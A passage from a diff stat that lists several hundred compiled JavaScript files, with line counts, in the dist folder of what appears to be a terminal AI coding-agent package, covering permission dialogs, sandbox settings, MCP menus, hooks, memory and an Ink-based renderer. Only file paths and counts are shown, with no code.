  547. package/dist/components/design-system/ThemedText.js +62 -0
  548. package/dist/components/design-system/color.js +16 -0
  549. package/dist/components/diff/DiffDetailView.js +298 -0
  550. package/dist/components/diff/DiffDialog.js +419 -0
  551. package/dist/components/diff/DiffFileList.js +308 -0
  552. package/dist/components/grove/Grove.js +544 -0
  553. package/dist/components/hooks/HooksConfigMenu.js +564 -0
  554. package/dist/components/hooks/PromptDialog.js +84 -0
  555. package/dist/components/hooks/SelectEventMode.js +133 -0
  556. package/dist/components/hooks/SelectHookMode.js +100 -0
  557. package/dist/components/hooks/SelectMatcherMode.js +129 -0
  558. package/dist/components/hooks/ViewHookMode.js +217 -0
  559. package/dist/components/mcp/CapabilitiesSection.js +61 -0
  560. package/dist/components/mcp/ElicitationDialog.js +969 -0
  561. package/dist/components/mcp/MCPAgentServerMenu.js +158 -0
  562. package/dist/components/mcp/MCPListPanel.js +547 -0
  563. package/dist/components/mcp/MCPReconnect.js +184 -0
  564. package/dist/components/mcp/MCPRemoteServerMenu.js +599 -0
  565. package/dist/components/mcp/MCPSettings.js +388 -0
  566. package/dist/components/mcp/MCPStdioServerMenu.js +161 -0
  567. package/dist/components/mcp/MCPToolDetailView.js +245 -0
  568. package/dist/components/mcp/MCPToolListView.js +144 -0
  569. package/dist/components/mcp/McpParsingWarnings.js +252 -0
  570. package/dist/components/mcp/index.js +18 -0
  571. package/dist/components/mcp/utils/reconnectHelpers.js +32 -0
  572. package/dist/components/memCodeHint/PluginHintMenu.js +72 -0
  573. package/dist/components/memCodeInChromeOnboarding.js +149 -0
  574. package/dist/components/memCodeMdExternalIncludesDialog.js +150 -0
  575. package/dist/components/memcode/Eye.js +29 -0
  576. package/dist/components/memcode/MemCodeViews.js +154 -0
  577. package/dist/components/memcode/MessageBubbleView.js +53 -0
  578. package/dist/components/memcode/SessionChrome.js +39 -0
  579. package/dist/components/memcode/SessionChromeView.js +208 -0
  580. package/dist/components/memcode/__snapshots__/header.txt +1 -0
  581. package/dist/components/memcode/__snapshots__/home.txt +15 -0
  582. package/dist/components/memcode/__snapshots__/inline-activity.txt +18 -0
  583. package/dist/components/memcode/__snapshots__/status-line.txt +1 -0
  584. package/dist/components/memcode/ink-primitives.js +11 -0
  585. package/dist/components/memcode/render-fixtures.js +308 -0
  586. package/dist/components/memcode/theme.js +93 -0
  587. package/dist/components/memory/MemoryFileSelector.js +444 -0
  588. package/dist/components/memory/MemoryUpdateNotification.js +48 -0
  589. package/dist/components/messageActions.js +414 -0
  590. package/dist/components/messages/AdvisorMessage.js +169 -0
  591. package/dist/components/messages/AssistantRedactedThinkingMessage.js +18 -0
  592. package/dist/components/messages/AssistantTextMessage.js +241 -0
  593. package/dist/components/messages/AssistantThinkingMessage.js +70 -0
  594. package/dist/components/messages/AssistantToolUseMessage.js +330 -0
  595. package/dist/components/messages/AttachmentMessage.js +556 -0
  596. package/dist/components/messages/CollapsedReadSearchContent.js +507 -0
  597. package/dist/components/messages/CompactBoundaryMessage.js +24 -0
  598. package/dist/components/messages/GroupedToolUseContent.js +44 -0
  599. package/dist/components/messages/HighlightedThinkingText.js +180 -0
  600. package/dist/components/messages/HookProgressMessage.js +123 -0
  601. package/dist/components/messages/PlanApprovalMessage.js +210 -0
  602. package/dist/components/messages/RateLimitMessage.js +156 -0
  603. package/dist/components/messages/ShutdownMessage.js +129 -0
  604. package/dist/components/messages/SnipBoundaryMessage.js +8 -0
  605. package/dist/components/messages/SystemAPIErrorMessage.js +57 -0
  606. package/dist/components/messages/SystemTextMessage.js +920 -0
  607. package/dist/components/messages/TaskAssignmentMessage.js +74 -0
  608. package/dist/components/messages/UserAgentNotificationMessage.js +84 -0
  609. package/dist/components/messages/UserBashInputMessage.js +58 -0
  610. package/dist/components/messages/UserBashOutputMessage.js +56 -0
  611. package/dist/components/messages/UserChannelMessage.js +137 -0
  612. package/dist/components/messages/UserCommandMessage.js +121 -0
  613. package/dist/components/messages/UserCrossSessionMessage.js +11 -0
  614. package/dist/components/messages/UserForkBoilerplateMessage.js +11 -0
  615. package/dist/components/messages/UserGitHubWebhookMessage.js +11 -0
  616. package/dist/components/messages/UserImageMessage.js +50 -0
  617. package/dist/components/messages/UserLocalCommandOutputMessage.js +182 -0
  618. package/dist/components/messages/UserMemoryInputMessage.js +82 -0
  619. package/dist/components/messages/UserPlanMessage.js +43 -0
  620. package/dist/components/messages/UserPromptMessage.js +60 -0
  621. package/dist/components/messages/UserResourceUpdateMessage.js +114 -0
  622. package/dist/components/messages/UserTeammateMessage.js +171 -0
  623. package/dist/components/messages/UserTextMessage.js +268 -0
  624. package/dist/components/messages/UserToolResultMessage/RejectedPlanMessage.js +33 -0
  625. package/dist/components/messages/UserToolResultMessage/RejectedToolUseMessage.js +15 -0
  626. package/dist/components/messages/UserToolResultMessage/UserToolCanceledMessage.js +18 -0
  627. package/dist/components/messages/UserToolResultMessage/UserToolErrorMessage.js +99 -0
  628. package/dist/components/messages/UserToolResultMessage/UserToolRejectMessage.js +83 -0
  629. package/dist/components/messages/UserToolResultMessage/UserToolResultMessage.js +92 -0
  630. package/dist/components/messages/UserToolResultMessage/UserToolSuccessMessage.js +70 -0
  631. package/dist/components/messages/UserToolResultMessage/utils.js +43 -0
  632. package/dist/components/messages/nullRenderingAttachments.js +43 -0
  633. package/dist/components/messages/teamMemCollapsed.js +144 -0
  634. package/dist/components/messages/teamMemSaved.js +11 -0
  635. package/dist/components/permissions/AskUserQuestionPermissionRequest/AskUserQuestionPermissionRequest.js +648 -0
  636. package/dist/components/permissions/AskUserQuestionPermissionRequest/PreviewBox.js +229 -0
  637. package/dist/components/permissions/AskUserQuestionPermissionRequest/PreviewQuestionView.js +261 -0
  638. package/dist/components/permissions/AskUserQuestionPermissionRequest/QuestionNavigationBar.js +205 -0
  639. package/dist/components/permissions/AskUserQuestionPermissionRequest/QuestionView.js +489 -0
  640. package/dist/components/permissions/AskUserQuestionPermissionRequest/SubmitQuestionsView.js +162 -0
  641. package/dist/components/permissions/AskUserQuestionPermissionRequest/use-multiple-choice-state.js +107 -0
  642. package/dist/components/permissions/BashPermissionRequest/BashPermissionRequest.js +409 -0
  643. package/dist/components/permissions/BashPermissionRequest/bashToolUseOptions.js +106 -0
  644. package/dist/components/permissions/ComputerUseApproval/ComputerUseApproval.js +483 -0
  645. package/dist/components/permissions/EnterPlanModePermissionRequest/EnterPlanModePermissionRequest.js +134 -0
  646. package/dist/components/permissions/ExitPlanModePermissionRequest/ExitPlanModePermissionRequest.js +659 -0
  647. package/dist/components/permissions/FallbackPermissionRequest.js +351 -0
  648. package/dist/components/permissions/FileEditPermissionRequest/FileEditPermissionRequest.js +186 -0
  649. package/dist/components/permissions/FilePermissionDialog/FilePermissionDialog.js +144 -0
  650. package/dist/components/permissions/FilePermissionDialog/ideDiffConfig.js +16 -0
  651. package/dist/components/permissions/FilePermissionDialog/permissionOptions.js +147 -0
  652. package/dist/components/permissions/FilePermissionDialog/useFilePermissionDialog.js +149 -0
  653. package/dist/components/permissions/FilePermissionDialog/usePermissionHandler.js +113 -0
  654. package/dist/components/permissions/FileWritePermissionRequest/FileWritePermissionRequest.js +171 -0
  655. package/dist/components/permissions/FileWritePermissionRequest/FileWriteToolDiff.js +84 -0
  656. package/dist/components/permissions/FilesystemPermissionRequest/FilesystemPermissionRequest.js +120 -0
  657. package/dist/components/permissions/NotebookEditPermissionRequest/NotebookEditPermissionRequest.js +171 -0
  658. package/dist/components/permissions/NotebookEditPermissionRequest/NotebookEditToolDiff.js +225 -0
  659. package/dist/components/permissions/PermissionDecisionDebugInfo.js +535 -0
  660. package/dist/components/permissions/PermissionDialog.js +49 -0
  661. package/dist/components/permissions/PermissionExplanation.js +258 -0
  662. package/dist/components/permissions/PermissionPrompt.js +313 -0
  663. package/dist/components/permissions/PermissionRequest.js +173 -0
  664. package/dist/components/permissions/PermissionRequestTitle.js +22 -0
  665. package/dist/components/permissions/PermissionRuleExplanation.js +116 -0
  666. package/dist/components/permissions/PowerShellPermissionRequest/PowerShellPermissionRequest.js +207 -0
  667. package/dist/components/permissions/PowerShellPermissionRequest/powershellToolUseOptions.js +73 -0
  668. package/dist/components/permissions/SandboxPermissionRequest.js +170 -0
  669. package/dist/components/permissions/SedEditPermissionRequest/SedEditPermissionRequest.js +230 -0
  670. package/dist/components/permissions/SkillPermissionRequest/SkillPermissionRequest.js +385 -0
  671. package/dist/components/permissions/WebFetchPermissionRequest/WebFetchPermissionRequest.js +265 -0
  672. package/dist/components/permissions/WorkerBadge.js +49 -0
  673. package/dist/components/permissions/WorkerPendingPermission.js +122 -0
  674. package/dist/components/permissions/hooks.js +143 -0
  675. package/dist/components/permissions/rules/AddPermissionRules.js +180 -0
  676. package/dist/components/permissions/rules/AddWorkspaceDirectory.js +350 -0
  677. package/dist/components/permissions/rules/PermissionRuleDescription.js +83 -0
  678. package/dist/components/permissions/rules/PermissionRuleInput.js +159 -0
  679. package/dist/components/permissions/rules/PermissionRuleList.js +1192 -0
  680. package/dist/components/permissions/rules/RecentDenialsTab.js +206 -0
  681. package/dist/components/permissions/rules/RemoveWorkspaceDirectory.js +107 -0
  682. package/dist/components/permissions/rules/WorkspaceTab.js +142 -0
  683. package/dist/components/permissions/shellPermissionHelpers.js +155 -0
  684. package/dist/components/permissions/useShellPermissionFeedback.js +108 -0
  685. package/dist/components/permissions/utils.js +21 -0
  686. package/dist/components/sandbox/SandboxConfigTab.js +106 -0
  687. package/dist/components/sandbox/SandboxDependenciesTab.js +182 -0
  688. package/dist/components/sandbox/SandboxDoctorSection.js +63 -0
  689. package/dist/components/sandbox/SandboxOverridesTab.js +211 -0
  690. package/dist/components/sandbox/SandboxSettings.js +302 -0
  691. package/dist/components/shell/ExpandShellOutputContext.js +27 -0
  692. package/dist/components/shell/OutputLine.js +109 -0
  693. package/dist/components/shell/ShellProgressMessage.js +152 -0
  694. package/dist/components/shell/ShellTimeDisplay.js +72 -0
  695. package/dist/components/skills/SkillsMenu.js +363 -0
  696. package/dist/components/tasks/AsyncAgentDetailDialog.js +273 -0
  697. package/dist/components/tasks/BackgroundTask.js +353 -0
  698. package/dist/components/tasks/BackgroundTaskStatus.js +407 -0
  699. package/dist/components/tasks/BackgroundTasksDialog.js +573 -0
  700. package/dist/components/tasks/DreamDetailDialog.js +290 -0
  701. package/dist/components/tasks/InProcessTeammateDetailDialog.js +313 -0
  702. package/dist/components/tasks/RemoteSessionDetailDialog.js +922 -0
  703. package/dist/components/tasks/RemoteSessionProgress.js +255 -0
  704. package/dist/components/tasks/ShellDetailDialog.js +427 -0
  705. package/dist/components/tasks/ShellProgress.js +82 -0
  706. package/dist/components/tasks/renderToolActivity.js +36 -0
  707. package/dist/components/tasks/taskStatusUtils.js +66 -0
  708. package/dist/components/teams/TeamStatus.js +82 -0
  709. package/dist/components/teams/TeamsDialog.js +643 -0
  710. package/dist/components/ui/OrderedList.js +69 -0
  711. package/dist/components/ui/OrderedListItem.js +49 -0
  712. package/dist/components/ui/TreeSelect.js +295 -0
  713. package/dist/components/wizard/WizardDialogLayout.js +62 -0
  714. package/dist/components/wizard/WizardNavigationFooter.js +19 -0
  715. package/dist/components/wizard/WizardProvider.js +213 -0
  716. package/dist/components/wizard/index.js +10 -0
  717. package/dist/components/wizard/useWizard.js +12 -0
  718. package/dist/constants/apiLimits.js +24 -0
  719. package/dist/constants/betas.js +51 -0
  720. package/dist/constants/common.js +21 -0
  721. package/dist/constants/cyberRiskInstruction.js +4 -0
  722. package/dist/constants/errorIds.js +4 -0
  723. package/dist/constants/figures.js +58 -0
  724. package/dist/constants/files.js +134 -0
  725. package/dist/constants/github-app.js +148 -0
  726. package/dist/constants/keys.js +7 -0
  727. package/dist/constants/memcodeDefaults.js +15 -0
  728. package/dist/constants/messages.js +4 -0
  729. package/dist/constants/oauth.js +159 -0
  730. package/dist/constants/outputStyles.js +176 -0
  731. package/dist/constants/product.js +49 -0
  732. package/dist/constants/prompts.js +664 -0
  733. package/dist/constants/querySource.js +0 -0
  734. package/dist/constants/spinnerVerbs.js +38 -0
  735. package/dist/constants/system.js +54 -0
  736. package/dist/constants/systemPromptSections.js +35 -0
  737. package/dist/constants/toolLimits.js +14 -0
  738. package/dist/constants/tools.js +89 -0
  739. package/dist/constants/turnCompletionVerbs.js +13 -0
  740. package/dist/constants/xml.js +89 -0
  741. package/dist/context/QueuedMessageContext.js +56 -0
  742. package/dist/context/fpsMetrics.js +28 -0
  743. package/dist/context/mailbox.js +39 -0
  744. package/dist/context/modalContext.js +32 -0
  745. package/dist/context/notifications.js +181 -0
  746. package/dist/context/overlayContext.js +97 -0
  747. package/dist/context/promptOverlayContext.js +95 -0
  748. package/dist/context/stats.js +211 -0
  749. package/dist/context/voice.js +66 -0
  750. package/dist/context.js +136 -0
  751. package/dist/coordinator/coordinatorMode.js +332 -0
  752. package/dist/cost-tracker.js +248 -0
  753. package/dist/costHook.js +20 -0
  754. package/dist/dialogLaunchers.js +63 -0
  755. package/dist/entrypoints/agentSdkTypes.js +68 -0
  756. package/dist/entrypoints/cli.js +320 -0
  757. package/dist/entrypoints/init.js +235 -0
  758. package/dist/entrypoints/mcp.js +162 -0
  759. package/dist/entrypoints/sandboxTypes.js +75 -0
  760. package/dist/entrypoints/sdk/controlSchemas.js +533 -0
  761. package/dist/entrypoints/sdk/coreSchemas.js +1562 -0
  762. package/dist/entrypoints/sdk/coreTypes.generated.js +4 -0
  763. package/dist/entrypoints/sdk/coreTypes.js +42 -0
  764. package/dist/entrypoints/sdk/runtimeTypes.js +0 -0
  765. package/dist/entrypoints/sdk/sdkUtilityTypes.js +4 -0
  766. package/dist/entrypoints/sdk/settingsTypes.generated.js +0 -0
  767. package/dist/entrypoints/sdk/toolTypes.js +0 -0
  768. package/dist/history.js +300 -0
  769. package/dist/hooks/fileSuggestions.js +527 -0
  770. package/dist/hooks/notifs/useAntOrgWarningNotification.js +5 -0
  771. package/dist/hooks/notifs/useAutoModeUnavailableNotification.js +40 -0
  772. package/dist/hooks/notifs/useCanSwitchToExistingSubscription.js +60 -0
  773. package/dist/hooks/notifs/useDeprecationWarningNotification.js +46 -0
  774. package/dist/hooks/notifs/useFastModeNotification.js +164 -0
  775. package/dist/hooks/notifs/useIDEStatusIndicator.js +185 -0
  776. package/dist/hooks/notifs/useInstallMessages.js +28 -0
  777. package/dist/hooks/notifs/useLspInitializationNotification.js +143 -0
  778. package/dist/hooks/notifs/useMcpConnectivityStatus.js +125 -0
  779. package/dist/hooks/notifs/useModelMigrationNotifications.js +49 -0
  780. package/dist/hooks/notifs/useNpmDeprecationNotification.js +6 -0
  781. package/dist/hooks/notifs/usePluginAutoupdateNotification.js +88 -0
  782. package/dist/hooks/notifs/usePluginInstallationStatus.js +138 -0
  783. package/dist/hooks/notifs/useRateLimitWarningNotification.js +116 -0
  784. package/dist/hooks/notifs/useSettingsErrors.js +70 -0
  785. package/dist/hooks/notifs/useStartupNotification.js +25 -0
  786. package/dist/hooks/notifs/useTeammateShutdownNotification.js +63 -0
  787. package/dist/hooks/renderPlaceholder.js +30 -0
  788. package/dist/hooks/toolPermission/PermissionContext.js +259 -0
  789. package/dist/hooks/toolPermission/handlers/coordinatorHandler.js +27 -0
  790. package/dist/hooks/toolPermission/handlers/interactiveHandler.js +375 -0
  791. package/dist/hooks/toolPermission/handlers/swarmWorkerHandler.js +90 -0
  792. package/dist/hooks/toolPermission/permissionLogging.js +149 -0
  793. package/dist/hooks/unifiedSuggestions.js +137 -0
  794. package/dist/hooks/useAfterFirstRender.js +17 -0
  795. package/dist/hooks/useApiKeyVerification.js +61 -0
  796. package/dist/hooks/useArrowKeyHistory.js +170 -0
  797. package/dist/hooks/useAssistantHistory.js +153 -0
  798. package/dist/hooks/useAwaySummary.js +96 -0
  799. package/dist/hooks/useBackgroundTaskNavigation.js +165 -0
  800. package/dist/hooks/useBlink.js +12 -0
  801. package/dist/hooks/useCanUseTool.js +197 -0
  802. package/dist/hooks/useCancelRequest.js +175 -0
  803. package/dist/hooks/useChromeExtensionNotification.js +52 -0
  804. package/dist/hooks/useClipboardImageHint.js +54 -0
  805. package/dist/hooks/useCommandKeybindings.js +86 -0
  806. package/dist/hooks/useCommandQueue.js +11 -0
  807. package/dist/hooks/useCopyOnSelect.js +45 -0
  808. package/dist/hooks/useDeferredHookMessages.js +34 -0
  809. package/dist/hooks/useDiffData.js +67 -0
  810. package/dist/hooks/useDiffInIDE.js +232 -0
  811. package/dist/hooks/useDirectConnect.js +176 -0
  812. package/dist/hooks/useDoublePress.js +45 -0
  813. package/dist/hooks/useDynamicConfig.js +17 -0
  814. package/dist/hooks/useElapsedTime.js +18 -0
  815. package/dist/hooks/useExitOnCtrlCD.js +38 -0
  816. package/dist/hooks/useExitOnCtrlCDWithKeybindings.js +8 -0
  817. package/dist/hooks/useFileHistorySnapshotInit.js +20 -0
  818. package/dist/hooks/useGlobalKeybindings.js +188 -0
  819. package/dist/hooks/useHistorySearch.js +237 -0
  820. package/dist/hooks/useIDEIntegration.js +63 -0
  821. package/dist/hooks/useIdeAtMentioned.js +50 -0
  822. package/dist/hooks/useIdeConnectionStatus.js +21 -0
  823. package/dist/hooks/useIdeLogging.js +37 -0
  824. package/dist/hooks/useIdeSelection.js +86 -0
  825. package/dist/hooks/useInboxPoller.js +735 -0
  826. package/dist/hooks/useInputBuffer.js +81 -0
  827. package/dist/hooks/useIssueFlagBanner.js +115 -0
  828. package/dist/hooks/useLogMessages.js +53 -0
  829. package/dist/hooks/useLspPluginRecommendation.js +166 -0
  830. package/dist/hooks/useMailboxBridge.js +16 -0
  831. package/dist/hooks/useMainLoopModel.js +20 -0
  832. package/dist/hooks/useManagePlugins.js +213 -0
  833. package/dist/hooks/useMemoryUsage.js +19 -0
  834. package/dist/hooks/useMergedClients.js +18 -0
  835. package/dist/hooks/useMergedCommands.js +13 -0
  836. package/dist/hooks/useMergedTools.js +24 -0
  837. package/dist/hooks/useMinDisplayTime.js +28 -0
  838. package/dist/hooks/useNotifyAfterTimeout.js +38 -0
  839. package/dist/hooks/useOfficialMarketplaceNotification.js +38 -0
  840. package/dist/hooks/usePasteHandler.js +164 -0
  841. package/dist/hooks/usePluginRecommendationBase.js +97 -0
  842. package/dist/hooks/usePrStatus.js +76 -0
  843. package/dist/hooks/usePromptSuggestion.js +129 -0
  844. package/dist/hooks/usePromptsFrommemCodeInChrome.js +64 -0
  845. package/dist/hooks/useQueueProcessor.js +35 -0
  846. package/dist/hooks/useRemoteSession.js +379 -0
  847. package/dist/hooks/useReplBridge.js +591 -0
  848. package/dist/hooks/useSSHSession.js +182 -0
  849. package/dist/hooks/useScheduledTasks.js +86 -0
  850. package/dist/hooks/useSearchInput.js +289 -0
  851. package/dist/hooks/useSessionBackgrounding.js +120 -0
  852. package/dist/hooks/useSettings.js +7 -0
  853. package/dist/hooks/useSettingsChange.js +19 -0
  854. package/dist/hooks/useSkillImprovementSurvey.js +74 -0
  855. package/dist/hooks/useSkillsChange.js +43 -0
  856. package/dist/hooks/useSwarmInitialization.js +43 -0
  857. package/dist/hooks/useSwarmPermissionPoller.js +175 -0
  858. package/dist/hooks/useTaskListWatcher.js +141 -0
  859. package/dist/hooks/useTasksV2.js +184 -0
  860. package/dist/hooks/useTeammateViewAutoExit.js +39 -0
  861. package/dist/hooks/useTeleportResume.js +79 -0
  862. package/dist/hooks/useTerminalSize.js +14 -0
  863. package/dist/hooks/useTextInput.js +372 -0
  864. package/dist/hooks/useTimeout.js +13 -0
  865. package/dist/hooks/useTurnDiffs.js +127 -0
  866. package/dist/hooks/useTypeahead.js +1037 -0
  867. package/dist/hooks/useUpdateNotification.js +28 -0
  868. package/dist/hooks/useVimInput.js +230 -0
  869. package/dist/hooks/useVirtualScroll.js +290 -0
  870. package/dist/hooks/useVoice.js +796 -0
  871. package/dist/hooks/useVoiceEnabled.js +15 -0
  872. package/dist/hooks/useVoiceIntegration.js +365 -0
  873. package/dist/hooks/usememCodeHintRecommendation.js +115 -0
  874. package/dist/ink/Ansi.js +233 -0
  875. package/dist/ink/bidi.js +78 -0
  876. package/dist/ink/clearTerminal.js +46 -0
  877. package/dist/ink/colorize.js +125 -0
  878. package/dist/ink/components/AlternateScreen.js +58 -0
  879. package/dist/ink/components/App.js +381 -0
  880. package/dist/ink/components/AppContext.js +10 -0
  881. package/dist/ink/components/Box.js +169 -0
  882. package/dist/ink/components/Button.js +159 -0
  883. package/dist/ink/components/ClockContext.js +102 -0
  884. package/dist/ink/components/CursorDeclarationContext.js +9 -0
  885. package/dist/ink/components/ErrorOverview.js +95 -0
  886. package/dist/ink/components/Link.js +38 -0
  887. package/dist/ink/components/Newline.js +29 -0
  888. package/dist/ink/components/NoSelect.js +39 -0
  889. package/dist/ink/components/RawAnsi.js +34 -0
  890. package/dist/ink/components/ScrollBox.js +131 -0
  891. package/dist/ink/components/Spacer.js +17 -0
  892. package/dist/ink/components/StdinContext.js +16 -0
  893. package/dist/ink/components/TerminalFocusContext.js +45 -0
  894. package/dist/ink/components/TerminalSizeContext.js +5 -0
  895. package/dist/ink/components/Text.js +195 -0
  896. package/dist/ink/constants.js +4 -0
  897. package/dist/ink/dom.js +240 -0
  898. package/dist/ink/events/click-event.js +32 -0
  899. package/dist/ink/events/dispatcher.js +148 -0
  900. package/dist/ink/events/emitter.js +28 -0
  901. package/dist/ink/events/event-handlers.js +26 -0
  902. package/dist/ink/events/event.js +12 -0
  903. package/dist/ink/events/focus-event.js +11 -0
  904. package/dist/ink/events/input-event.js +92 -0
  905. package/dist/ink/events/keyboard-event.js +31 -0
  906. package/dist/ink/events/terminal-event.js +73 -0
  907. package/dist/ink/events/terminal-focus-event.js +11 -0
  908. package/dist/ink/focus.js +127 -0
  909. package/dist/ink/frame.js +26 -0
  910. package/dist/ink/get-max-width.js +8 -0
  911. package/dist/ink/global.d.js +0 -0
  912. package/dist/ink/hit-test.js +76 -0
  913. package/dist/ink/hooks/use-animation-frame.js +25 -0
  914. package/dist/ink/hooks/use-app.js +7 -0
  915. package/dist/ink/hooks/use-declared-cursor.js +30 -0
  916. package/dist/ink/hooks/use-input.js +34 -0
  917. package/dist/ink/hooks/use-interval.js +40 -0
  918. package/dist/ink/hooks/use-search-highlight.js +26 -0
  919. package/dist/ink/hooks/use-selection.js +62 -0
  920. package/dist/ink/hooks/use-stdin.js +7 -0
  921. package/dist/ink/hooks/use-tab-status.js +50 -0
  922. package/dist/ink/hooks/use-terminal-focus.js +9 -0
  923. package/dist/ink/hooks/use-terminal-title.js +19 -0
  924. package/dist/ink/hooks/use-terminal-viewport.js +42 -0
  925. package/dist/ink/ink.js +1306 -0
  926. package/dist/ink/instances.js +5 -0
  927. package/dist/ink/layout/engine.js +7 -0
  928. package/dist/ink/layout/geometry.js +63 -0
  929. package/dist/ink/layout/node.js +72 -0
  930. package/dist/ink/layout/yoga.js +242 -0
  931. package/dist/ink/line-width-cache.js +16 -0
  932. package/dist/ink/log-update.js +458 -0
  933. package/dist/ink/measure-element.js +8 -0
  934. package/dist/ink/measure-text.js +31 -0
  935. package/dist/ink/node-cache.js +25 -0
  936. package/dist/ink/optimizer.js +52 -0
  937. package/dist/ink/output.js +440 -0
  938. package/dist/ink/parse-keypress.js +547 -0
  939. package/dist/ink/reconciler.js +400 -0
  940. package/dist/ink/render-border.js +140 -0
  941. package/dist/ink/render-node-to-output.js +774 -0
  942. package/dist/ink/render-to-screen.js +145 -0
  943. package/dist/ink/renderer.js +101 -0
  944. package/dist/ink/root.js +83 -0
  945. package/dist/ink/screen.js +913 -0
  946. package/dist/ink/searchHighlight.js +50 -0
  947. package/dist/ink/selection.js +476 -0
  948. package/dist/ink/squash-text-nodes.js +54 -0
  949. package/dist/ink/stringWidth.js +129 -0
  950. package/dist/ink/styles.js +296 -0
  951. package/dist/ink/supports-hyperlinks.js +33 -0
  952. package/dist/ink/tabstops.js +37 -0
  953. package/dist/ink/terminal-focus-state.js +40 -0
  954. package/dist/ink/terminal-querier.js +136 -0
  955. package/dist/ink/terminal.js +127 -0
  956. package/dist/ink/termio/ansi.js +69 -0
  957. package/dist/ink/termio/csi.js +243 -0
  958. package/dist/ink/termio/dec.js +48 -0
  959. package/dist/ink/termio/esc.js +38 -0
  960. package/dist/ink/termio/osc.js +304 -0
  961. package/dist/ink/termio/parser.js +284 -0
  962. package/dist/ink/termio/sgr.js +262 -0
  963. package/dist/ink/termio/tokenize.js +184 -0
  964. package/dist/ink/termio/types.js +37 -0
  965. package/dist/ink/termio.js +8 -0
  966. package/dist/ink/useTerminalNotification.js +103 -0
  967. package/dist/ink/warn.js +11 -0
  968. package/dist/ink/widest-line.js +16 -0
  969. package/dist/ink/wrap-text.js +50 -0
  970. package/dist/ink/wrapAnsi.js +6 -0
  971. package/dist/ink.js +95 -0
  972. package/dist/interactiveHelpers.js +282 -0
  973. package/dist/keybindings/KeybindingContext.js +175 -0
  974. package/dist/keybindings/KeybindingProviderSetup.js +212 -0
  975. package/dist/keybindings/defaultBindings.js +311 -0
  976. package/dist/keybindings/loadUserBindings.js +302 -0
  977. package/dist/keybindings/match.js +55 -0
  978. package/dist/keybindings/parser.js +153 -0
  979. package/dist/keybindings/reservedShortcuts.js +85 -0
  980. package/dist/keybindings/resolver.js +115 -0
  981. package/dist/keybindings/schema.js +187 -0
  982. package/dist/keybindings/shortcutFormat.js +27 -0
  983. package/dist/keybindings/template.js +32 -0
  984. package/dist/keybindings/useKeybinding.js +108 -0
  985. package/dist/keybindings/useShortcutDisplay.js +27 -0
  986. package/dist/keybindings/validate.js +321 -0
  987. package/dist/macro.js +19 -0
  988. package/dist/main.js +3574 -0
  989. package/dist/memdir/findRelevantMemories.js +93 -0
  990. package/dist/memdir/memdir.js +317 -0
  991. package/dist/memdir/memoryAge.js +26 -0
  992. package/dist/memdir/memoryScan.js +51 -0
  993. package/dist/memdir/memoryShapeTelemetry.js +5 -0
  994. package/dist/memdir/memoryTypes.js +206 -0
  995. package/dist/memdir/paths.js +126 -0
  996. package/dist/memdir/teamMemPaths.js +158 -0
  997. package/dist/memdir/teamMemPrompts.js +89 -0
  998. package/dist/migrations/migrateAutoUpdatesToSettings.js +44 -0
  999. package/dist/migrations/migrateBypassPermissionsAcceptedToSettings.js +33 -0
  1000. package/dist/migrations/migrateEnableAllProjectMcpServersToSettings.js +73 -0
  1001. package/dist/migrations/migrateFennecToOpus.js +30 -0
  1002. package/dist/migrations/migrateLegacyOpusToCurrent.js +33 -0
  1003. package/dist/migrations/migrateOpusToOpus1m.js +26 -0
  1004. package/dist/migrations/migrateReplBridgeEnabledToRemoteControlAtStartup.js +14 -0
  1005. package/dist/migrations/migrateSonnet1mToSonnet45.js +32 -0
  1006. package/dist/migrations/migrateSonnet45ToSonnet46.js +44 -0
  1007. package/dist/migrations/resetAutoModeOptInForDefaultOffer.js +34 -0
  1008. package/dist/migrations/resetProToOpusDefault.js +45 -0
  1009. package/dist/moreright/useMoreRight.js +11 -0
  1010. package/dist/native-ts/color-diff/index.js +714 -0
  1011. package/dist/native-ts/file-index/index.js +310 -0
  1012. package/dist/native-ts/file-search/index.js +73 -0
  1013. package/dist/native-ts/yoga-layout/enums.js +114 -0
  1014. package/dist/native-ts/yoga-layout/index.js +1815 -0
  1015. package/dist/outputStyles/loadOutputStylesDir.js +65 -0
  1016. package/dist/plugins/builtinPlugins.js +99 -0
  1017. package/dist/plugins/bundled/index.js +5 -0
  1018. package/dist/projectOnboardingState.js +65 -0
  1019. package/dist/public/leak-tweet.png +0 -0
  1020. package/dist/public/memcode-files.png +0 -0
  1021. package/dist/query/config.js +24 -0
  1022. package/dist/query/deps.js +15 -0
  1023. package/dist/query/stopHooks.js +327 -0
  1024. package/dist/query/tokenBudget.js +51 -0
  1025. package/dist/query.js +1160 -0
  1026. package/dist/remote/RemoteSessionManager.js +210 -0
  1027. package/dist/remote/SessionsWebSocket.js +291 -0
  1028. package/dist/remote/remotePermissionBridge.js +60 -0
  1029. package/dist/remote/sdkMessageAdapter.js +171 -0
  1030. package/dist/replLauncher.js +22 -0
  1031. package/dist/schemas/hooks.js +110 -0
  1032. package/dist/screens/Doctor.js +789 -0
  1033. package/dist/screens/REPL.js +4977 -0
  1034. package/dist/screens/ResumeConversation.js +365 -0
  1035. package/dist/server/createDirectConnectSession.js +64 -0
  1036. package/dist/server/directConnectManager.js +143 -0
  1037. package/dist/server/types.js +12 -0
  1038. package/dist/server/xmemServer.js +172 -0
  1039. package/dist/services/AgentSummary/agentSummary.js +121 -0
  1040. package/dist/services/MagicDocs/magicDocs.js +168 -0
  1041. package/dist/services/MagicDocs/prompts.js +91 -0
  1042. package/dist/services/PromptSuggestion/promptSuggestion.js +380 -0
  1043. package/dist/services/PromptSuggestion/speculation.js +706 -0
  1044. package/dist/services/SessionMemory/prompts.js +247 -0
  1045. package/dist/services/SessionMemory/sessionMemory.js +298 -0
  1046. package/dist/services/SessionMemory/sessionMemoryUtils.js +111 -0
  1047. package/dist/services/analytics/config.js +12 -0
  1048. package/dist/services/analytics/datadog.js +225 -0
  1049. package/dist/services/analytics/firstPartyEventLogger.js +274 -0
  1050. package/dist/services/analytics/firstPartyEventLoggingExporter.js +548 -0
  1051. package/dist/services/analytics/growthbook.js +638 -0
  1052. package/dist/services/analytics/index.js +63 -0
  1053. package/dist/services/analytics/metadata.js +535 -0
  1054. package/dist/services/analytics/sink.js +48 -0
  1055. package/dist/services/analytics/sinkKillswitch.js +9 -0
  1056. package/dist/services/api/adminRequests.js +45 -0
  1057. package/dist/services/api/bootstrap.js +126 -0
  1058. package/dist/services/api/client.js +299 -0
  1059. package/dist/services/api/dumpPrompts.js +164 -0
  1060. package/dist/services/api/emptyUsage.js +18 -0
  1061. package/dist/services/api/errorUtils.js +148 -0
